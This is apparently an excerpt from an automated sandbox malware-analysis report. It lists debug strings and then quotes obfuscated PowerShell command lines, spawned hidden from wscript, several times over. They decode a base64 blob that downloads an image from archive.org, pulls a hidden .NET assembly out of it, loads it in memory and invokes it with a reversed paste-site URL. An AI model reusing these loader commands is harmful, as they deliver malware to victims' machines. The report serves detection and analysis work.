              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dllhost.pdb source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dllhost.pdbGCTL source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = 